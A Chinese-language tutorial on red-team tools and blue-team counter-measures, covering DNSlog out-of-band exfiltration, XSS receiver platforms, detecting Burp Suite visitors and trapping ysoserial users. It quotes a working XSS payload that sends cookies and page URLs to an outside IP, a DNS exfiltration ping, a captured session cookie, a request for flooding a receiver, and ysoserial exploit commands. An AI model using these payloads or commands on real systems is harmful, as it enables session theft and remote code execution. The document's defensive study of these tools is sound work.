一、dnslog

1.1、DNSlong原理

DNS在解析的时候会留下日志,这类工具就是读取多级域名的解析日志,来获取信息,简单来说就是把信息放在多级子域名中,传递到我们自己的服务器中,然后读取日志,获取特定信息,最后根据获取的信息来判断我们渗透测试的动作是否成功运行。在一些无回显的漏洞利用中,DNSlog被广泛使用。

常见的DNSLOG平台:

image-20240402140246332

1.2、dnslog红队应用场景

DNS外带

ping `whoami`.8o5x9p.dnslog.cn

1.3、dnslog反制

针对dnslog和httplog 的反制,获取到对方的payload 的url ,然后批量使用站长之家进行批量ping 或者使用腾讯云函数进行批量访问,对方列表会满满的都是请求。而且大部分dnslog显示会有上限,会不断覆盖,影响其正常使用。

多地ping:多个地点Ping服务器,网站测速 - 站长工具 (chinaz.com)

image-20240402143431210

image-20240402143422920

平台一般都有限制,一次最多显示10条数据,可以根据这种方式来进行干扰

二、XSS平台

攻击者可以利用XSS漏洞获取管理员的cookie信息,然后使用该cookie信息登陆到系统后台,从而进一步攻破系统。xss平台是一个集成的XSS攻击与控制平台,能够自动生成payload,接收和管理受害者的浏览器回传信息,被红队广泛使用:

2.1、xss在线平台

地址:
https://github.com/trysec/BlueLotus_XSSReceiver
docker搭建(需要拥有公网Linux服务器):
https://github.com/Hack3rHan/XSSReceiver-Docker

23

  • 攻击xss漏洞

24

  • 管理受害者信息

25

2.2、提取攻击信息

通过F12网络发现xss请求http://158.247.240.30:18081/myjs/xss.js

26

varwebsite="http://158.247.240.30:18081"; 
(function(){(newImage()).src=website+'/?keepsession=1&location='+escape((function(){try{returndocument.location.href}catch(e){return''}})())+'&toplocation='+escape((function(){try{returntop.location.href}catch(e){return''}})())+'&cookie='+escape((function(){try{returndocument.cookie}catch(e){return''}})())+'&opener='+escape((function(){try{return(window.opener&&window.opener.location.href)?window.opener.location.href:''}catch(e){return''}})());})();

获取拼接url

http://158.247.240.30:18081/?keepsession=1&location=http%3A//158.247.240.30%3A10006/vulnerabilities/xss_s/&toplocation=http%3A//158.247.240.30%3A10006/vulnerabilities/xss_s/&cookie=PHPSESSID%3D3floq093lgmdffej55q0cmmb03%3B%20security%3Dlow&opener=

2.3、反制Xss平台

不停的发送请求或发起污染请求

http://158.247.240.30:18081/?keepsession=1&location=http://fukkyooou&toplocation=fukkyooou&cookie=gggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggg&opener=

27

三、burpsuite

3.1、burpsuite应用场景

burpsuite 是一个
渗透测试
中必备的抓包工具,几乎每个做渗透的都会用这个软件。对于一个网站来说,网站的访问者如果挂了 burpsuite 的代理来访问网站,那多半是不怀好意的。如果能识别出来访问者使用了 burpsuite 那就可以直接丢进蜜罐。burpsuite 的代理是可以访问到
http://burp/
这个地址的

image-20240402162844901

3.2、检测burpsuite

将这个html代码放到服务器或者或者kali中,然后打开web服务

<script src="http://burp/jquery.js"onload="alert('found burp')"></script>

访问这个页面会触发弹窗,前提是浏览器使用burp的情况下。

  • 此页面放至KALI或公网云服务器,并开启监听python3 -m http.server 9999
<!DOCTYPE html> 
<html lang="en"> 
    <head> 
        <meta charset="UTF-8"> <meta name="viewport"content="width=device-width, initial-scale=1.0"> 
        <title>Hello</title> <script>
        function burp(){ console.log("burp!!!"); location.href ="https://www.baidu.com";
                        var img =new Image();
                        img.src ="http://burp/favicon.ico"; img.onload =function(){burp(); } 
        </script> 
    </head> 
    <body> 
        <h1>测试</h1> 
    </body> 
</html>

23

四、ysoserial

4.1、ysoserial应用场景

https://github.com/frohoff/ysoserial
java反序列化利用工具(几乎人人必备,其他java反序列化工具,如jndiExploit、fastjsonExploit等基本都是基于ysoserial),此工具必须java8或java11才能运行,kali上自带的java17无法满足其运行条件。

4.2、ysoserial反制

ysoserial本身并不会攻击漏洞,而是提供攻击漏洞的弹药库(反序列化利用链),而正如弹药库本身会存在安全隐患一样,ysoserial本身会存在反序列化漏洞(这一点是几乎无法避免的,其他类似工具也是如此)

  • 蓝队视角(准备钓鱼红队)
java -cp ysoserial-master-8eb5cbfbf6-1.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections6 "calc.exe"

image-20240402181303754

  • 红队视角

    java -cp ysoserial-master-8eb5cbfbf6-1.jar ysoserial.exploit.RMIRegistryExploit 127.0.0.1 1099 CommonsCollections6 whoami

    红队看到蓝队端口打开,想尝试着执行命令whoami,查看蓝队信息,结果反被弹出计算器

image-20240402181324106